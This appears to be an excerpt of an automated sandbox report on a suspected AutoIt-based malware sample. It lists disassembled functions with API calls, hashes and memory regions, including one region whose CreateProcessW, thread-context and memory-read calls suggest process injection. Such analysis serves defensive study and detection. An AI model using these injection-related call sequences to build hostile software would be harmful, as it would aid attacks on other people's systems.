                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 45935d05c48d2d7c515d9eb909ce7bf3d0481c6f0129b11ec40d4c74fdf30183
                                                            • Instruction ID: 3648e636234c68df52763efa9026d3f0924e7736779291d009675a36ac8f28dc
                                                            • Opcode Fuzzy Hash: 45935d05c48d2d7c515d9eb909ce7bf3d0481c6f0129b11ec40d4c74fdf30183
                                                            • Instruction Fuzzy Hash: D8F0A47190021E67DB50BA94EC11AFEBBAC9F11751F204426FB1496292DF709A44E6E3
                                                            Function 00CF53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            • __lock_file.LIBCMT ref: 00CF53EB
                                                              • Part of subcall function 00CF6C11: __lock.LIBCMT ref: 00CF6C34
                                                            • __fclose_nolock.LIBCMT ref: 00CF53F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: 0d4b762eef894ea6bfbd7dbfd7911da121183dc284099ce06771c167992d27b6
                                                            • Instruction ID: eccab37bc6c216184c4d49b3cc582bceb24ffc9052bb5db77dd7b3eb92228e85
                                                            • Opcode Fuzzy Hash: 0d4b762eef894ea6bfbd7dbfd7911da121183dc284099ce06771c167992d27b6
                                                            • Instruction Fuzzy Hash: 39F09631900A0C9BDB916B799C017BD66A06F41374F218105A764AB1D1CBFC4A497B53
                                                            Function 013C129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 013C1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013C1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013C1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                            • Instruction ID: 27453cfa4a15ac1cb54eff94a45701db1abddd078592592ef6e972e2984a3a3e
                                                            • Opcode Fuzzy Hash: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                            • Instruction Fuzzy Hash: 6212CD24E24658C6EB24DF64D8507DEB232EF68700F1090ED910DEB7A5E77A4E81CF5A
                                                            Function 00D0FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 16dc2f124540186d8028898e0c315b0fde7bfaab2343429d1282f31bb18d8ede
                                                            • Instruction ID: ff9e2d760c8c5c183b032755f181132f10a85cb1b6010aff5647acf0dbc0c0bd
                                                            • Opcode Fuzzy Hash: 16dc2f124540186d8028898e0c315b0fde7bfaab2343429d1282f31bb18d8ede
                                                            • Instruction Fuzzy Hash: 8541F474608341DFDB24DF24C484B1ABBE1BF85318F1988ADE9998B762C772EC45CB52
                                                            Function 00CD7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 3382ed75bb926a2c6ef61da3d2c5274c56f4765570a2432cc1a3d111fdf85456
                                                            • Instruction ID: 70d731f59e47972ec09d1721e381f5cd8d79972a6a4161605a82f5a0a9d7eafa
                                                            • Opcode Fuzzy Hash: 3382ed75bb926a2c6ef61da3d2c5274c56f4765570a2432cc1a3d111fdf85456
                                                            • Instruction Fuzzy Hash: 1E213872614B08FBEB144F26E841B79BBB4FB14350F24892FE589C5290EB3181D0D765
                                                            Function 00CD4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00CD4BEF
                                                              • Part of subcall function 00CF525B: __wfsopen.LIBCMT ref: 00CF5266
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4E0F
                                                              • Part of subcall function 00CD4B6A: FreeLibrary.KERNEL32(00000000), ref: 00CD4BA4
                                                              • Part of subcall function 00CD4C70: _memmove.LIBCMT ref: 00CD4CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                            • String ID:
                                                            • API String ID: 1396898556-0
                                                            • Opcode ID: c98e0f4224676b7b744665df105cd49fb60d531d4b973d9f51f325279c4408f8
                                                            • Instruction ID: de65aada3334912a695f042fdb875220ddc6ef593d9d54d0ad34e4a5952de64c
                                                            • Opcode Fuzzy Hash: c98e0f4224676b7b744665df105cd49fb60d531d4b973d9f51f325279c4408f8
                                                            • Instruction Fuzzy Hash: 3011A731600305BBCF19BFB1C816F6DB7A5AF44710F10842FFB45AB681DA719905A761
                                                            Function 00D0FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 28a6335a0b77824eeb17bba264b2cca6e0b30eb111f9b232e1a1ae4e97f74772
                                                            • Instruction ID: fb0afcf51178d97363f7c28be758cd3ca7ed970dd0e7ad7d368f4e1cf489b453
                                                            • Opcode Fuzzy Hash: 28a6335a0b77824eeb17bba264b2cca6e0b30eb111f9b232e1a1ae4e97f74772
                                                            • Instruction Fuzzy Hash: 15213374908301DFCB14DF24C444A2ABBE1BF88314F058968FA9A87722D731E809CBA3
                                                            Function 00CF4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00CF48A6
                                                              • Part of subcall function 00CF8B28: __getptd_noexit.LIBCMT ref: 00CF8B28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2597487223-0
                                                            • Opcode ID: 30b0fdc0b5658cd33a34931cb7ea009276a8abd39ccd5669f724fa03c05dc292
                                                            • Instruction ID: 3b00984defcd46381c6715e7bb759c3991829eb3a48d3919fa9f00934952afd0
                                                            • Opcode Fuzzy Hash: 30b0fdc0b5658cd33a34931cb7ea009276a8abd39ccd5669f724fa03c05dc292
                                                            • Instruction Fuzzy Hash: 4CF02D3190020DEBEF99AFB48C063BF36A0AF00761F058404F620EA1C1CBB88A50EB53
                                                            Function 00CF0739 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CF07B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath
                                                            • String ID:
                                                            • API String ID: 82841172-0
                                                            • Opcode ID: 7fbafeae321e6022c238e96fe08b3ff242bec264dd274e7a4e42338809bc9fc6
                                                            • Instruction ID: feda08d06ee3de4e4a0c75b9def2b26cdebf3d2af2a5dfe55fc6b95a0c6c8e3e
                                                            • Opcode Fuzzy Hash: 7fbafeae321e6022c238e96fe08b3ff242bec264dd274e7a4e42338809bc9fc6
                                                            • Instruction Fuzzy Hash: 38F0E936945294DBD32267286801EF47B58EF87320F0506E7FC58C7D11D5204D4ACBE2
                                                            Function 00CD4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,00D952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00CD4E7E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 07ee47983c59a85bb95612978b92c16d9a6f287cd5f7e4140553f8289a34736a
                                                            • Instruction ID: 8f3d970c7d272dcadedd47573e1ffd5c53abbaab95263135b7a2bf465279282c
                                                            • Opcode Fuzzy Hash: 07ee47983c59a85bb95612978b92c16d9a6f287cd5f7e4140553f8289a34736a
                                                            • Instruction Fuzzy Hash: 5EF01575501B11EFCB389F65E494822FBE1BF143293208A3EE3E682B20C7329844DB50
                                                            Function 00CF0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CF07B0
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_memmove
                                                            • String ID:
                                                            • API String ID: 2514874351-0
                                                            • Opcode ID: 89b42b7aeb060c537c95531b3b51e26a8f3ea46fc5b9859d032165ba577311b4
                                                            • Instruction ID: 01031e00000dd8c4ee7d1659f10052fa82fef01a1eecd30ab8c109502bc29a83
                                                            • Opcode Fuzzy Hash: 89b42b7aeb060c537c95531b3b51e26a8f3ea46fc5b9859d032165ba577311b4
                                                            • Instruction Fuzzy Hash: 7FE0867690422857C720A6689C05FEA77DDDB887A1F0441B6FD0CD7344D9609C8086E0
                                                            Function 00CF525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: 682ab1f5047a843c4b53989eabb62e476773f9a2e8209be3b99bd1c301aae4ef
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: DBB0927644020C7BCE012A82FC02A593F199B41764F408020FB0C18162A673A664AA8A
                                                            Function 00CF0C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 2dbcd2babc60c3bfeb09caaffe6dd63ded9dbbe1383b16a8f5d3dd06da47369e
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: AE31F5B4A001099BC758DF09C484979FBA6FB49700B3487A5E91ACB356D731EEC1DBC2
                                                            Function 013C229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 013C22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction ID: a016ef5ba54121e053e72cf829cbcc957f8ceaa092e463b78f3c7a37956fddf7
                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                            • Instruction Fuzzy Hash: 37E0BF7494020EEFDB00EFA8D5496DE7BB4EF04711F1005A5FD05D7681DB319E548A62
                                                            Function 013C22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 013C22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396799655.00000000013C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_13c0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 7b6882b290192f94afdfc025f91d5635aec46c1dc5234d51acf4a1222c1f3877
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 8AE0E67494020EDFDB00EFB8D54969E7FB4EF04701F100165FD01D2281D6319D508A72

                                                            Non-executed Functions

                                                            Function 00D5CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00D5CB37
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D5CB95
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5CBD6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D5CC00
                                                            • SendMessageW.USER32 ref: 00D5CC29
                                                            • _wcsncpy.LIBCMT ref: 00D5CC95
                                                            • GetKeyState.USER32(00000011), ref: 00D5CCB6
                                                            • GetKeyState.USER32(00000009), ref: 00D5CCC3
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D5CCD9
                                                            • GetKeyState.USER32(00000010), ref: 00D5CCE3
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D5CD0C
                                                            • SendMessageW.USER32 ref: 00D5CD33
                                                            • SendMessageW.USER32(?,00001030,?,00D5B348), ref: 00D5CE37
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00D5CE4D
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00D5CE60
                                                            • SetCapture.USER32(?), ref: 00D5CE69
                                                            • ClientToScreen.USER32(?,?), ref: 00D5CECE
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00D5CEDB
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D5CEF5
                                                            • ReleaseCapture.USER32 ref: 00D5CF00
                                                            • GetCursorPos.USER32(?), ref: 00D5CF3A
                                                            • ScreenToClient.USER32(?,?), ref: 00D5CF47
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D5CFA3
                                                            • SendMessageW.USER32 ref: 00D5CFD1
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D5D00E
                                                            • SendMessageW.USER32 ref: 00D5D03D
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D5D05E
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00D5D06D
                                                            • GetCursorPos.USER32(?), ref: 00D5D08D
                                                            • ScreenToClient.USER32(?,?), ref: 00D5D09A
                                                            • GetParent.USER32(?), ref: 00D5D0BA
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D5D123
                                                            • SendMessageW.USER32 ref: 00D5D154
                                                            • ClientToScreen.USER32(?,?), ref: 00D5D1B2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D5D1E2
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D5D20C
                                                            • SendMessageW.USER32 ref: 00D5D22F
                                                            • ClientToScreen.USER32(?,?), ref: 00D5D281
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00D5D2B5
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00D5D351
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$@U=u$F
                                                            • API String ID: 3977979337-1007936534
                                                            • Opcode ID: 01cf019850ccdca5694fdae9edda5498c7f45aea686224a6033d9adfeee34cc2
                                                            • Instruction ID: 5f42768fa2115264ba5ca763da3331911e83121e6231c7d131904df5da10d74f
                                                            • Opcode Fuzzy Hash: 01cf019850ccdca5694fdae9edda5498c7f45aea686224a6033d9adfeee34cc2
                                                            • Instruction Fuzzy Hash: 15428C74204340AFDB21CF24D844BAABBE5FF49352F180929FE95CB2A0D731D848DB62
                                                            Function 00CE6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-1798697756
                                                            • Opcode ID: f158d8c9dda09fbc385af5d42a2bc63f1d0872b8e0807b1d0ca4d019a0a0756b
                                                            • Instruction ID: 098fba0242e8719f78149a89b6a551e9cc450cd4fc17f887aed4cc58ddd509f5
                                                            • Opcode Fuzzy Hash: f158d8c9dda09fbc385af5d42a2bc63f1d0872b8e0807b1d0ca4d019a0a0756b
                                                            • Instruction Fuzzy Hash: D893C335E00229DFDB24CF59D881BBDB7B1FF58314F24816AE955AB280E7749E81CB60
                                                            Function 00CD48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
